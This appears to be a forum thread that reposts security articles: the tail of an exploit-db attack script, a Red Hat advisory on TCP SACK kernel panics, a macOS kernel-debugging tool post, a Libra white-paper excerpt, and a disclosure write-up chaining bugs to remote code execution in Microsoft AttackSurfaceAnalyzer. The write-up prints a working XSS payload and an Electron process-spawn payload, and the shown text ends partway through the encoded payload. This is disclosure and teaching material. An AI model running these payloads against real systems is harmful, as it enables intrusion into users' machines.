    echo -e " [√]"
    echo -e "[*] System seems vulnerable! [√]\n"
    echo -e "[*] Starting attack..."
    startAttack
  else
    echo " [✗]"
    echo "[*] System is NOT vulnerable :( [✗]"
  fi
else
  echo " [✗]"
  echo "[*] System is NOT vulnerable :( [✗]"
fi; tput cnorm

Sursa: https://www.exploit-db.com/exploits/46989?utm_source=dlvr.it&utm_medium=twitter
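The script above only works because the Yama LSM's ptrace scope is left at its most permissive setting, so gdb can attach to other processes of the same user (here, the user's shells). A minimal hardening sketch, using the standard Yama sysctl knobs; pick the policy level that suits the environment:

    # 0 = classic ptrace (what the exploit needs), 1 = only direct children,
    # 2 = admin-only (CAP_SYS_PTRACE), 3 = no ptrace attach at all
    cat /proc/sys/kernel/yama/ptrace_scope

    # Tighten it at runtime...
    sysctl -w kernel.yama.ptrace_scope=1

    # ...and persist it across reboots
    echo 'kernel.yama.ptrace_scope = 1' > /etc/sysctl.d/10-ptrace.conf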
  3. Facebook CTF 2019 Challenges This repository contains the challenge source code and solutions for Facebook CTF 2019. Sursa: https://github.com/fbsamples/fbctf-2019-challenges
  4. Executive Summary

Three related flaws were found in the Linux kernel's handling of TCP networking. The most severe vulnerability could allow a remote attacker to trigger a kernel panic in systems running the affected software and, as a result, impact the system's availability.

The issues have been assigned multiple CVEs: CVE-2019-11477 is considered Important severity, whereas CVE-2019-11478 and CVE-2019-11479 are considered Moderate severity. The first two are related to Selective Acknowledgement (SACK) packets combined with the Maximum Segment Size (MSS); the third relates solely to the Maximum Segment Size (MSS). These issues are corrected either through applying mitigations or kernel patches. Mitigation details and links to RHSA advisories can be found on the RESOLVE tab of this article.

Issue Details and Background

Three related flaws were found in the Linux kernel's handling of TCP Selective Acknowledgement (SACK) packets with a low MSS size. The extent of the impact is understood to be limited to denial of service at this time; no privilege escalation or information leak is currently suspected. While the mitigations shown in this article are available, they might affect traffic from legitimate sources that require the lower MSS values to transmit correctly, as well as system performance. Please evaluate which mitigation is appropriate for the system's environment before applying it.

What is a selective acknowledgement?

TCP Selective Acknowledgment (SACK) is a mechanism where the data receiver can inform the sender about all the segments that have been successfully accepted. This allows the sender to retransmit only the segments of the stream that are missing from its 'known good' set. When TCP SACK is disabled, a much larger set of retransmits is required to retransmit a complete stream.

What is MSS?

The maximum segment size (MSS) is a parameter set in the TCP header of a packet that specifies the total amount of data contained in a reconstructed TCP segment. As packets might become fragmented when transmitting across different routes, a host must specify the MSS as equal to the largest IP datagram payload size that it can handle. Very large MSS sizes might mean that a stream of packets ends up fragmented on its way to the destination, whereas smaller packets ensure less fragmentation but carry more unused overhead. Operating systems and transport types default to specified MSS sizes. Attackers with privileged access can create raw packets with crafted MSS options to mount this attack.

TCP SACKs

TCP is a connection-oriented protocol. When two parties wish to communicate over a TCP connection, they establish it by exchanging certain information, such as a request to initiate the connection (SYN), the initial sequence number, the acknowledgement number, the maximum segment size (MSS) to use over this connection, permission to send and process Selective Acknowledgements (SACKs), etc. This connection establishment process is known as the 3-way handshake.

TCP sends and receives user data in a unit called a segment. A TCP segment consists of the TCP header, options and user data. Each TCP segment has a Sequence Number (SEQ) and an Acknowledgement Number (ACK). These SEQ and ACK numbers are used to track which segments have been successfully received; the ACK number indicates the next segment expected by the receiver.

Example: user 'A' sends 1 kilobyte of data in 13 segments of 100 bytes each; 13 because each segment has a TCP header of 20 bytes, leaving only 80 bytes of payload per segment. On the receiving end, user 'B' receives segments 1, 2, 4, 6 and 8-13; segments 3, 5 and 7 are lost and never reach user 'B'. Using ACK numbers, user 'B' indicates that it is expecting segment number 3, which user 'A' reads as none of the segments after 2 having been received, so user 'A' retransmits all the segments from 3 onwards, even though segments 4, 6 and 8-13 were successfully received by user 'B'. User 'B' has no way to indicate that to user 'A'. This leads to inefficient usage of the network.

Selective Acknowledgement: SACK

To overcome the above problem, the Selective Acknowledgement (SACK) mechanism was devised and defined in RFC 2018. With SACK, user 'B' uses its TCP options field to inform user 'A' about all the segments (1, 2, 4, 6, 8-13) it has received successfully, so user 'A' needs to retransmit only segments 3, 5 and 7, considerably saving network bandwidth and avoiding further congestion.

CVE-2019-11477 SACK Panic

Socket Buffers (SKB): the Socket Buffer (SKB) is the most central data structure used in the Linux TCP/IP implementation. It is a linked list of buffers which holds network packets; such a list can act as a transmission queue, receive queue, SACK'd queue, retransmission queue, etc. An SKB can hold packet data in fragments; a Linux SKB can hold up to 17 fragments:

    /* linux/include/linux/skbuff.h */
    #define MAX_SKB_FRAGS (65536/PAGE_SIZE + 1)   /* => 17 */

with each fragment holding up to 32 KB of data on x86 (64 KB on PowerPC). When a packet is due to be sent, it is placed on the send queue and its details are kept in a control buffer structure like:

    /* linux/include/linux/skbuff.h */
    struct tcp_skb_cb {
        __u32 seq;          /* Starting sequence number */
        __u32 end_seq;      /* SEQ + FIN + SYN + datalen */
        __u32 tcp_tw_isn;
        struct {
            u16 tcp_gso_segs;
            u16 tcp_gso_size;
        };
        __u8 tcp_flags;     /* TCP header flags. (tcp[13]) */
        ...
    };

Of these, the 'tcp_gso_segs' and 'tcp_gso_size' fields are used to tell the device driver about segmentation offload. When segmentation offload is on and the SACK mechanism is also enabled, then, due to packet loss and selective retransmission of some packets, an SKB could end up holding multiple packets, counted by 'tcp_gso_segs'. Multiple such SKBs in the list are merged together into one to efficiently process different SACK blocks, which involves moving data from one SKB to another in the list. During this movement of data, the SKB structure can reach its maximum limit of 17 fragments, and the 'tcp_gso_segs' parameter can overflow and hit the BUG_ON() call below, resulting in the kernel panic:

    static bool tcp_shifted_skb(struct sock *sk, ..., unsigned int pcount, ...)
    {
        ...
        tcp_skb_pcount_add(prev, pcount);
        BUG_ON(tcp_skb_pcount(skb) < pcount);   /* <= SACK panic */
        tcp_skb_pcount_add(skb, -pcount);
        ...
    }

A remote user can trigger this issue by setting the Maximum Segment Size (MSS) of a TCP connection to its lowest limit of 48 bytes and sending a sequence of specially crafted SACK packets. The lowest MSS leaves merely 8 bytes of data per segment, thus increasing the number of TCP segments required to send all data.

Acknowledgements

Jonathan Looney (Netflix Information Security)

References

RFC-2018 - TCP selective acknowledgments
How SKB's work
Netflix (reporters) original report.

Sursa: https://access.redhat.com/security/vulnerabilities/tcpsack
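The article defers the actual remediation steps to its RESOLVE tab. As a rough sketch of the stop-gaps that were commonly published for these CVEs (not a substitute for the vendor guidance or the kernel patches), one can block low-MSS connections at the firewall and/or disable SACK processing:

    # Drop inbound TCP connections that advertise a very low MSS
    # (1:500 is the commonly cited range; adjust to your advisory)
    iptables -I INPUT -p tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j DROP

    # Alternatively, disable TCP selective acknowledgements entirely
    # (this can reduce throughput on lossy links)
    sysctl -w net.ipv4.tcp_sack=0
    echo 'net.ipv4.tcp_sack = 0' > /etc/sysctl.d/99-tcpsack.conf

Both settings carry the side effects the article warns about (legitimate low-MSS clients and SACK-dependent performance), so treat them as temporary measures until patched kernels are installed.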
  5. LLDBagility: practical macOS kernel debugging

Date: Tue 18 June 2019 | By: Francesco Cagnin | Category: macOS | Tags: macOS, XNU, kernel, hypervisor, debugging, FDP, LLDBagility

This is the second of two blog posts about macOS kernel debugging. In the previous post, we defined most of the terminology used in both articles, described how kernel debugging is implemented for the macOS kernel and discussed the limitations of the available tools; here, we present LLDBagility, our solution for an easier and more functional macOS debugging experience.

As the reader may have concluded after reading the previous blog post [1], in the current state of things debugging the macOS kernel (XNU) is not very practical, especially considering inconveniences like having to install debug kernel builds and the impossibility of setting watchpoints or pausing the execution of the kernel from the debugger. To improve the situation, we developed LLDBagility [2], a tool for debugging macOS virtual machines with the aid of the Fast Debugging Protocol (FDP, described later in the article). Above all else, LLDBagility implements a set of new LLDB commands that allow the debugger to:

- attach to running macOS VirtualBox virtual machines and debug their kernel, stealthily, without the need to change the guest OS (e.g. no necessity of DEVELOPMENT or DEBUG kernels, boot-args modification or SIP disabling) and with minimal changes to the configuration of the VM [3];
- interrupt (and later resume) the execution of the guest kernel at any moment;
- set hardware breakpoints anywhere in kernel code, even at the start of the boot process;
- set hardware watchpoints that trigger on read and/or write accesses to the specified memory locations;
- save and restore the state of the VM in a few seconds.

These commands are intended to be used alongside the ones already available in LLDB, like memory/register read/write, (software) breakpoints, stepping and so on. Moreover, in case the debugged kernel comes with its Kernel Debug Kit (and possibly even when it doesn't, as discussed later), the vast majority of lldbmacros work as expected.

In the next sections, we first briefly describe what FDP is and how it enhances VirtualBox to enable virtual machine introspection; then, we examine how LLDBagility takes advantage of these new capabilities to connect LLDB transparently to macOS virtual machines, and demonstrate a simple kernel debugging session; finally, we present some ideas for using existing lldbmacros with kernel builds lacking a debug kit.

Virtual machine introspection via the Fast Debugging Protocol

The Fast Debugging Protocol [4] is a light, fast and efficient debugging API for stealthy introspection of virtual machines, written in C and currently only released as a patch to VirtualBox's source code [FDP]. This API makes it possible to:

- read and write VM registers and memory;
- set and unset hardware/software breakpoints and watchpoints;
- pause, resume and single-step the execution of the virtual machines;
- save and restore the state of the VMs.

FDP's stealthiness comes from the manipulation of the Extended Page Tables of the virtual machines (an operation that can be very difficult to detect from the guests), while its speed is the result of using shared memory between FDP and the VMs (reaching in some cases one million memory reads per second).
In addition to the low-level C interface, the API also provides Python bindings (PyFDP) that can be useful both for quick proofs of concept and for bigger projects like LLDBagility; as an example, here is a script that breaks on every system call:

#!/usr/bin/env python2
from PyFDP.FDP import FDP

# Open the debuggee VM by its name
fdp = FDP("18E226")

# Pause the VM to install a breakpoint
fdp.Pause()

# Install a hardware breakpoint (very fast and stealth)
UnixSyscall64 = 0xffffff80115bae84
fdp.dr0 = UnixSyscall64
fdp.dr7 = 0x403

# Resume the execution after the breakpoint installation
fdp.Resume()

while True:
    # Wait for a breakpoint hit
    fdp.WaitForStateChanged()
    print "%x" % (fdp.rax)
    # Jump over the breakpoint
    fdp.SingleStep()
    # Resume the debuggee
    fdp.Resume()

More details about FDP can be found in the original article on Winbagility [4] (in French) [WinbagilitySSTIC2016], LLDBagility's older counterpart for Windows and WinDbg.

Attaching LLDB to virtual machines

As presented at length in the previous post, during regular two-machine debugging, LLDB interacts with the macOS kernel of the debuggee by sending commands to its internal KDP stub, which, being itself part of the kernel, is then able to inspect and alter the state of the machine as requested and communicate back the results. The key idea behind LLDBagility is to replicate the functionalities provided by such an agent using the analogous capabilities of (virtual) machine introspection and modification offered by FDP at the hypervisor level, so that the kernel's debugging stub can be replaced by an equivalent alternative external to the debugged machine. In addition, by maintaining compatibility with the KDP protocol, this new stub can take advantage of LLDB's existing support for the macOS kernel without modifying the debugger in any aspect, since there is no difference in communications with respect to the KDP server in the kernel. In this regard, Ian Beer used an analogous solution for his iOS kernel debugger [5].

This approach brings two notable advantages: the elimination of the need to enable KDP in the kernel for debugging, and the possibility of augmenting LLDBagility's stub with additional features. All the limitations of the classic debugging method described in the first blog post can now be overcome. First of all, since setting up XNU for debugging is not required anymore, it becomes unnecessary to modify the NVRAM and possibly disable SIP; likewise, there is also no need to install DEBUG or DEVELOPMENT builds. Secondly, all system-wide side effects related to KDP code disappear, implying for example a more difficult debugger detection by rootkits. Thirdly, debugging can now start before the initialisation of the KDP stub during the kernel boot process. Finally, having complete control over the machine thanks to FDP makes it easy to implement hardware breakpoints, watchpoints and a mechanism for pausing the kernel at the debugger's command.
Overview of the tool

As mentioned in the introduction, LLDBagility's front end is a set of new LLDB commands, implemented in lldbagility.py (from [LLDBagility100]):

- fdp-attach, or simply fa, to connect the debugger to a running macOS VirtualBox virtual machine;
- fdp-hbreakpoint, or fh, to set and unset read/write/execute hardware breakpoints;
- fdp-interrupt, or fi, to pause the execution of the VM and return control to the debugger (equivalent to the known sudo dtrace -w -n "BEGIN { breakpoint(); }");
- fdp-save, or fs, to save the current state of the VM;
- fdp-restore, or fr, to restore the VM to the last saved state.

On the other hand, the back end is composed of:

- kdpserver.py, the new KDP server (a replacement of XNU's) to which LLDB is connected, whose job is to translate the KDP requests received by the debugger into commands for the VM and send back responses and exception notifications (e.g. breakpoint hits);
- stubvm.py, for abstracting common VM operations and actualising them with FDP.

The connection between LLDB and the virtual machine to debug is established on fdp-attach. When the user executes this command, LLDBagility:

- instantiates a PyFDP client for interacting with the VM (lldbagility.py#L73);
- starts its own KDP server on a secondary thread (lldbagility.py#L93), waiting for requests (kdpserver.py#L182);
- executes the LLDB command kdp-remote to connect the debugger to the KDP server that has just started (lldbagility.py#L99, a procedure explained in detail in the first blog post), kicking off the debugging process.

As a last interesting note, the translation of KDP requests into corresponding FDP commands is not sufficient to have lldbmacros working correctly. In fact, such macros rely on the ability to use some fields of the kdp struct (osfmk/kdp/kdp_internal.h#L41/#L55, tools/lldbmacros/core/operating_system.py#L777, both from [XNU49032212]), which are populated by the kernel only when its KDP stub is enabled (e.g. osfmk/kdp/kdp_udp.c#L1349). LLDBagility obviates the problem by hooking memory reads from the debugger to the kdp struct and returning a patched memory chunk in which the necessary fields (e.g. kdp_thread) are filled with proper values (stubvm.py#L242).

Demo

The following video demonstrates a quick debugging session with LLDBagility. In summary:

- LLDB is started and fdp-attach'ed to the virtual machine named "18E226" running in the background;
- the lldbmacros (automatically loaded from .lldbinit) showcurrentthreads and showrights are executed;
- the execution of the VM is resumed with the continue command and then quickly interrupted with fdp-interrupt;
- the state of the VM is first saved with fdp-save, then modified by simply resuming the machine execution, and finally restored with fdp-restore;
- a read and write watchpoint is set with fdp-hbreakpoint on &(*(boot_args*)PE_state.bootArgs).flags, which triggers immediately thereafter inside csr_check().

Reusing debug information between kernels

In this last section we explore some ideas about debugging kernels with lldbmacros coming from a Kernel Debug Kit released for a different kernel build. The methods proposed here have their obvious limitations, but they have also been proven to work sufficiently well and are worth a shot; see KDKutils/ for code and examples. As mentioned in the first post, the absence of KDKs for most kernel builds makes debugging more difficult, since in such cases type information and lldbmacros are not available.
Luckily, the debug information required by these macros to work correctly comprises a relatively small number of global variables and structs, like version (config/version.c#L40) and kdp, whose definitions do not change much (or at all) from one kernel version to the next. In this light, it seems reasonable to try to reuse debug information from available KDKs so that most features of existing lldbmacros can be used with kernels lacking their own debug kit.

As an example, let us assume we have debug information (i.e. the DWARF file generated during compilation) and lldbmacros for kernel build A, but not for build B. With the goal of loading and using A's lldbmacros for debugging B in LLDB, it is possible to provide the debugger with a "fake" DWARF file for kernel B, created by patching A's in such a way that:

- its Mach-O UUID matches B's instead of A's, and
- the load addresses of all symbols used by the macros match the virtual load addresses of the same symbols in B's memory at run time.

These two small changes should be enough to have most macros working. The simple approach just discussed works well when the symbols used by lldbmacros have very similar definitions in the code of the two kernels, which is naturally the case when they are successive releases. When this does not happen (for example when a field is added or removed from the thread struct), the workaround above is no longer sufficient, since it becomes necessary to also modify the DWARF file to alter type definitions; but this is not easy. For such cases, it is possible and better to create the fake DWARF from scratch, by first parsing a source DWARF file to extract type information about the structures used by lldbmacros, and then generating C source files containing the type definitions. These sources can easily be edited by hand to modify types as desired and then compiled so that a new DWARF file is created. Before loading it in LLDB, the DWARF file must be patched as above to change its UUID and load addresses to match the kernel being debugged.

Wrapping up

With this post, we presented LLDBagility, a convenient alternative to classic macOS kernel debugging based on virtual machine introspection. While not perfect (yet), our solution sets aside or greatly alleviates all current limitations of the standard approach, and at the same time offers powerful additional features that make debugging much more practical. LLDBagility has been actively used at Quarkslab in the past months and it is being released for others to experiment with; feedback via GitHub is welcome and encouraged. Happy debugging!

References and footnotes

[FDP] Source code of the Fast Debugging Protocol. Available at https://github.com/Winbagility/Winbagility/tree/fe1e38c2cbad6a1fb92dbad3440c6381768aa8cc/src/FDP/, https://github.com/Winbagility/Winbagility/tree/fe1e38c2cbad6a1fb92dbad3440c6381768aa8cc/src/VBoxPatch/ and https://github.com/Winbagility/Winbagility/tree/fe1e38c2cbad6a1fb92dbad3440c6381768aa8cc/bindings/python/
[WinbagilitySSTIC2016] Couffin, Nicolas. (2016). Débogage furtif et introspection de machine virtuelle ("Stealthy debugging and virtual machine introspection"). Available at https://www.sstic.org/media/SSTIC2016/SSTIC-actes/debogage_furtif_et_introspection_de_machines_virtu/SSTIC2016-Article-debogage_furtif_et_introspection_de_machines_virtuelles-couffin.pdf
[LLDBagility100] Source code of LLDBagility 1.0.0. Available at https://github.com/quarkslab/LLDBagility/tree/v1.0.0/
[XNU49032212] Source code of XNU 4903.221.2 from macOS 10.14.1. Available at https://github.com/apple/darwin-xnu/tree/xnu-4903.221.2/
[1] https://blog.quarkslab.com/an-overview-of-macos-kernel-debugging.html
[2] https://github.com/quarkslab/LLDBagility/
[3] As per current FDP limitations: the VM must use a single processor and no more than 2 GB of RAM.
[4] https://winbagility.github.io/
[5] https://bugs.chromium.org/p/project-zero/issues/detail?id=1417#c16

Sursa: https://blog.quarkslab.com/lldbagility-practical-macos-kernel-debugging.html
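For orientation, a session using the commands described above might look roughly like the transcript below. The command names and the VM name come from the post, but the exact invocation syntax and output are assumptions; refer to the LLDBagility README for the authoritative usage.

    $ lldb
    (lldb) fdp-attach 18E226      # or simply: fa -- attach to the running VirtualBox VM
    (lldb) showcurrentthreads     # lldbmacros loaded from .lldbinit work as usual
    (lldb) fdp-save               # snapshot the current VM state
    (lldb) continue
    (lldb) fdp-interrupt          # pause the guest and get the LLDB prompt back
    (lldb) fdp-restore            # roll back to the snapshot taken above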
  6. Libra’s mission is to enable a simple global currency and financial infrastructure that empowers billions of people. This document outlines our plans for a new decentralized blockchain, a low-volatility cryptocurrency, and a smart contract platform that together aim to create a new opportunity for responsible financial services innovation. Problem Statement The advent of the internet and mobile broadband has empowered billions of people globally to have access to the world's knowledge and information, high-fidelity communications, and a wide range of lower-cost, more convenient services. These services are now accessible using a $40 smartphone from almost anywhere in the world.1 This connectivity has driven economic empowerment by enabling more people to access the financial ecosystem. Working together, technology companies and financial institutions have also found solutions to help increase economic empowerment around the world. Despite this progress, large swaths of the world's population are still left behind — 1.7 billion adults globally remain outside of the financial system with no access to a traditional bank, even though one billion have a mobile phone and nearly half a billion have internet access.2 For too many, parts of the financial system look like telecommunication networks pre-internet. Twenty years ago, the average price to send a text message in Europe was 16 cents per message.3 Now everyone with a smartphone can communicate across the world for free with a basic data plan. Back then, telecommunications prices were high but uniform; whereas today, access to financial services is limited or restricted for those who need it most — those impacted by cost, reliability, and the ability to seamlessly send money. All over the world, people with less money pay more for financial services. Hard-earned income is eroded by fees, from remittances and wire costs to overdraft and ATM charges. Payday loans can charge annualized interest rates of 400 percent or more, and finance charges can be as high as $30 just to borrow $100.4 When people are asked why they remain on the fringe of the existing financial system, those who remain “unbanked” point to not having sufficient funds, high and unpredictable fees, banks being too far away, and lacking the necessary documentation.5 Blockchains and cryptocurrencies have a number of unique properties that can potentially address some of the problems of accessibility and trustworthiness. These include distributed governance, which ensures that no single entity controls the network; open access, which allows anybody with an internet connection to participate; and security through cryptography, which protects the integrity of funds. But the existing blockchain systems have yet to reach mainstream adoption. Mass-market usage of existing blockchains and cryptocurrencies has been hindered by their volatility and lack of scalability, which have, so far, made them poor stores of value and mediums of exchange. Some projects have also aimed to disrupt the existing system and bypass regulation as opposed to innovating on compliance and regulatory fronts to improve the effectiveness of anti-money laundering. We believe that collaborating and innovating with the financial sector, including regulators and experts across a variety of industries, is the only way to ensure that a sustainable, secure and trusted framework underpins this new system. 
And this approach can deliver a giant leap forward toward a lower-cost, more accessible, more connected global financial system. Sursa: https://libra.org/en-US/white-paper/#introduction
  7. Chaining Three Bugs to Get RCE in Microsoft AttackSurfaceAnalyzer Background What is AttackSurfaceAnalyzer (ASA)? Electron, Electron EveryWhere! Running ASA Vuln 1: Listening on All Interfaces Kestrel's Host Filtering Vuln2: Cross-Site Scripting XSS Root Cause Analysis XSS in Guest from Remote Payloads Vuln 3: XSS to RCE via NodeIntegration The RCE Payload Funky Gifs The Good and the Bad How Can We Fix This? Fixes Timeline This is a blog post about how I found three vulns and chained them to get RCE in the Microsoft AttackSurfaceAnalyzer (ASA moving forward) GUI version. ASA uses Electron.NET which binds the internal Kestrel web server to 0.0.0.0. If permission is given to bypass the Windows OS firewall (or if used on an OS without one), a remote attacker can connect to it and access the application. The web application is vulnerable to Cross-Site Scripting (XSS). A remote attacker can submit a runID with embedded JavaScript that is executed by the victim using the ASA Electron application. Electron.NET does not have the NodeIntegration flag set to false. This allows the JavaScript payload to spawn up processes on the victim's machine. Background Around a month ago someone posted a link to the new version of the tool from Microsoft. Matt who is my ultimate boss said: Wrote the first version of that with John Lambert over a holiday break... I had never seen the tool before but I had used an internal tool which basically did the same thing and more. What is AttackSurfaceAnalyzer (ASA)? According to Microsoft Attack Surface Analyzer takes a snapshot of your system state before and after the installation of other software product(s) and displays changes to a number of key elements of the system attack surface. You run it before you install an application/service and then after. Finally, you can compare these two runs to see what the application has installed on the machine. ASA is typically run as root/admin. Because the application needs as much access as possible to document and monitor changes to the machine. Electron, Electron EveryWhere! The new version of the application is based on Electron. Electron is a framework for packaging webapps as desktop applications. Think of it as a Chromium instance opening your webapp running locally. To learn more about Electron, please read any of the many tutorials. Electron apps are very popular. I am writing this text in VS Code which is another Electron app. ASA uses Electron.NET which "is a wrapper around a "normal" Electron application with an embedded ASP.NET Core application." I am not very familiar with the inner-workings of either framework but it looks like it runs a local Kestrel web server and then opens an ASP.NET web application via Electron. Running ASA I downloaded ASA v2.0.143 and started it in a Windows VM from modern.ie. ASA should be run as admin to get the most visibility into the system/application. After running ASA in an admin prompt. I saw the Windows Firewall alert. First Run This was strange. Why would a local Electron app need to open Firewall ports? Looking at the command prompt, I saw the culprit. C:\Users\IEUser\Downloads\AsaGui-windows-2.0.141> Electron Socket IO Port: 8000 Electron Socket started on port 8000 at 127.0.0.1 ASP.NET Core Port: 8001 stdout: Use Electron Port: 8000 stdout: Hosting environment: Production Content root path: C:\Users\IEUser\Downloads\AsaGui-windows-2.0.141\resources\app\bin\ Now listening on: http://0.0.0.0:8001 Application started. Press Ctrl+C to shut down. 
The Kestrel web server is listening on all interfaces on port 8001. The port is not static, we can see in the application's source code that it starts from port 8000 and uses the first two available ports. The first is used by Electron and the second by the Kestrel web server. In a typical scenario, the ports will be 8000 and 8001. Electron.NET/ElectronNET.Host/main.js#L141 title 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 function startAspCoreBackend(electronPort) { // hostname needs to be localhost, otherwise Windows Firewall will be triggered. portscanner.findAPortNotInUse(8000, 65535, 'localhost', function (error, electronWebPort) { console.log('ASP.NET Core Port: ' + electronWebPort); loadURL = `http://localhost:${electronWebPort}`; const parameters = [`/electronPort=${electronPort}`, `/electronWebPort=${electronWebPort}`]; let binaryFile = manifestJsonFile.executable; const os = require('os'); if (os.platform() === 'win32') { binaryFile = binaryFile + '.exe'; } let binFilePath = path.join(currentBinPath, binaryFile); var options = { cwd: currentBinPath }; // Run the binary with params and options. apiProcess = process(binFilePath, parameters, options); apiProcess.stdout.on('data', (data) => { console.log(`stdout: ${data.toString()}`); }); }); } These ports are passed to the binary as command line parameters. The binary file is located at AsaGui-windows-2.0.141/resources/app/bin/electron.manifest.json in a key named executable: { "executable": "AttackSurfaceAnalyzer-GUI" } Using procmon (use the filter Process Name is AttackSurfaceAnalyzer-GUI or use Tools > Process Tree) we can see the parameters in action. AttackSurfaceAnalyzer-GUI.exe /electronPort=8000 /electronWebPort=8001 Command line parameters We can manually go to localhost:8001 to see the application in the browser and interact with it. ASA in browser Vuln 1: Listening on All Interfaces The Kestrel web server listening on all interfaces. If it gets permission to open ports or if you do not have a firewall (disable on Windows or running on an OS without one), anyone can connect to it from outside. I created a host-only network interface between the guest VM and the host. After navigating to the guest IP in the host's browser at 192.168.56.101:8001, I got the following error: HTTP Error 400. The request hostname is invalid. Hostname is invalid Or in Burp: HTTP/1.1 400 Bad Request Connection: close Date: Tue, 21 May 2019 20:14:36 GMT Content-Type: text/html Server: Kestrel Content-Length: 334 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>Bad Request</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></ HEAD > <BODY><h2>Bad Request - Invalid Hostname</h2> <hr><p>HTTP Error 400. The request hostname is invalid.</p> </BODY></HTML> Note the Server: Kestrel response header which is not really secret information. Kestrel's Host Filtering Kestrel has a host filtering middleware. Read more about it at: Kestrel web server implementation in ASP.NET Core - Host Filtering It filters incoming requests by the Host header. We can use a simple Proxy > Options > Match and Replace rule in Burp to convert our requests' Host header from 192.168.56.101:8001 to localhost:8001 and access the web application remotely. 
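The same Host-header rewrite can be scripted outside of Burp. A minimal sketch (the guest IP, the port and the third-party requests package are assumptions, not part of the original write-up):

# Reach the remote Kestrel instance while presenting the Host value it expects.
# Assumes the guest is reachable on 192.168.56.101:8001 and that `requests` is installed.
import requests

TARGET = "http://192.168.56.101:8001/"

# Kestrel's host filtering only inspects the Host header, so send "localhost:8001"
# while the TCP connection still goes to the remote address.
resp = requests.get(TARGET, headers={"Host": "localhost:8001"}, timeout=10)
print(resp.status_code)
print(resp.text[:200])

A 200 response carrying the ASA landing page instead of the 400 "Invalid Hostname" error confirms that the filter only looks at the header value.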
Bypass Host Filtering This setting is enabled inside AsaGui-windows-2.0.141/resources/app/bin/appsettings.json via AllowedHosts: { "Logging": { "LogLevel": { "Default": "Warning" } }, "AllowedHosts": "localhost", "ApplicationInsights": { "InstrumentationKey": "79fc14e7-936c-4dcf-ba66-9a4da6e341ef" } } Vuln2: Cross-Site Scripting The application does not have a lot of injection points. User input is very limited. We can submit scans and then analyze them. We can export the results in specific paths and create reports. The Run Id is pretty much the only place with user input. Let's try a basic injection script and submit a run. When submitting a run, select something simple like Certificates for quick runs. Note: Run Ids are stored in a SQLite database and must be unique per app. XSS in Browser Oops! XSS Root Cause Analysis This is the request to submit our previous run. http://192.168.56.101:8001/Home/StartCollection?Id=<script>alert(1)</script>& File=false&Port=false&Service=false&User=false&Registry=false&Certificates=true The application then calls GetCollectors to get information about the current run and display progress. http://192.168.56.101:8001/Home/GetCollectors The response to the app is a string containing a JSON object. The beautified version of our test run is: { "RunId": "<script>alert(1)</script>", "Runs": { "CertificateCollector": 3 } } The value of RunId is injected directly into the web page. The culprit is at js/Collect.js:174: GetCollectors() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 function GetCollectors() { $.getJSON('GetCollectors', function (result) { var data = JSON.parse(result); var rundata = data.Runs; var keepChecking = false; var anyCollectors = false; var icon, midword; $('#ScanStatus').empty(); if (Object.keys(rundata).length > 0) { // INJECTION $('#ScanStatus').append($('<div/>', { html: l("%StatusReportFor") + data.RunId + ".</i>" })); } // Removed }); } There's no input validation or output encoding for data.RunId. Interestingly, the IDs appear output encoded in the Result tab. Not being Lewis Ardern (solid 5/7 JavaScript guy), I am glad this simple payload worked. XSS in Guest from Remote Payloads We have this reflected XSS which is pretty much worthless. Ok, not completely worthless. If an attacker can make you click on a link to localhost:8001 and submit a payload, they can get XSS in your ASA/browser inside the VM. Not really that useful. But it gets better because the XSS persists in the guest VM running the ASA Electron app. Without submitting a new run, navigate to the Scan tab (or click on it again) in ASA's Electron app inside the guest VM and you should see the alert. When you navigate to the Scan tab, the application retrieves the information for the latest submitted run (the one we submitted from host VM) and the injected payload is executed. This means an attacker can connect to the app via port 8001, submit XSS and then it will pop in ASA when we use it locally. Vuln 3: XSS to RCE via NodeIntegration Being Electron, I immediately thought of RCE. There are a lot of write-ups about how you can convert an XSS to RCE in Electron. It's easy when NodeIntegration is enabled which is the case for Electron.NET (link to the current commit😞 WebPreferences.cs 1 2 3 4 5 /// <summary> /// Whether node integration is enabled. Default is true. 
/// </summary> [DefaultValue(true)] public bool NodeIntegration { get; set; } = true; More info: Electron Security - Do not enable Node.js Integration for Remote Content This means we can use the XSS to spawn processes in the guest VM running ASA. Note that there are NodeIntegration bypasses so just disabling it might not be enough. The RCE Payload It's the typical Electron XSS to RCE payload. Google one and use it. XSS to RCE Payload 1 2 3 4 5 6 7 8 9 var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function(a,b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key+'='+env[key]); proc.spawn({file:'calc.exe',args:[],cwd:null,windowsVerbatimArguments:false, detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'}, {type:'ignore'}]}); Use the JavaScript eval String.fromCharCode encoder to convert it to the following. Then submit a new run with the payload as the Run Id from the browser in the host machine (note that I have added a bogus id element to make each payload unique): <img id="5" src=x onerror=eval(String.fromCharCode(118,97,114,32,80,114,111,99, 101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103, 40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101, 115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111, 99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32, 102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32, 101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114, 32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101, 121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107, 101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46, 115,112,97,119,110,40,123,102,105,108,101,58,39,99,97,108,99,46,101,120,101,39, 44,97,114,103,115,58,91,93,44,99,119,100,58,110,117,108,108,44,119,105,110,100, 111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58, 102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44, 101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91, 